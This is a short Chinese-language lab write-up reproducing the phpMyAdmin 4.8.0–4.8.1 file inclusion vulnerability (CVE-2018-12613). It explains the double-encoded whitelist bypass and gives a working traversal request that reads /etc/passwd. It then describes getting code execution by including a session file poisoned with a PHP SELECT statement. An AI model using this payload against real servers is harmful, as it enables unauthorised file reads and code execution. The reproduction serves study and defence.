phpmyadmin(CVE-2018-12613)文件包含漏洞复现

phpMyAdmin是一套开源的、基于Web的MySQL数据库管理工具。其index.php中存在一处文件包含逻辑，通过二次编码即可绕过检查，造成远程文件包含漏洞。

受影响的版本

phpMyAdmin

4.8.0

4.8.1

漏洞复现

环境开始后，请访问。phpmyadmin 是"config"模式，因此我们可以直接登录。http://your-ip:8080


 

在index.php中已经定义好了target_blacklist的值，它们是import.php和export.php，只要不等于这两个值就可以。

如果page在白名单中就会直接 return true

白名单如下

     'db_datadict.php',
     'db_sql.php',
     'db_events.php',
     'db_export.php',
     'db_importdocsql.php',
     'db_multi_table_query.php',
     'db_structure.php',
     'db_import.php',
     'db_operations.php',
     'db_search.php',
     'db_routines.php',
     'export.php',
     'import.php',
     'index.php',
     'pdf_pages.php',
     'pdf_schema.php',
     'server_binlog.php',
     'server_collations.php',
     'server_databases.php',
     'server_engines.php',
     'server_export.php',
     'server_import.php',
     'server_privileges.php',
     'server_sql.php',
     'server_status.php',
     'server_status_advisor.php',
     'server_status_monitor.php',
     'server_status_queries.php',
     'server_status_variables.php',
     'server_variables.php',
     'sql.php',
     'tbl_addfield.php',
     'tbl_change.php',
     'tbl_create.php',
     'tbl_import.php',
     'tbl_indexes.php',
     'tbl_sql.php',
     'tbl_export.php',

 

我们直接访问http://your-ip:8080/index.php?target=db_sql.php%253f/../../../../../../../../etc/passwd

 

 

我们通过包含session临时文件来实现命令执行 执行一个SELECT '<?php phpinfo(); ?>' 命令然后查看session值来访问临时文件

 

 

 

访问该临时文件，发现命令执行成功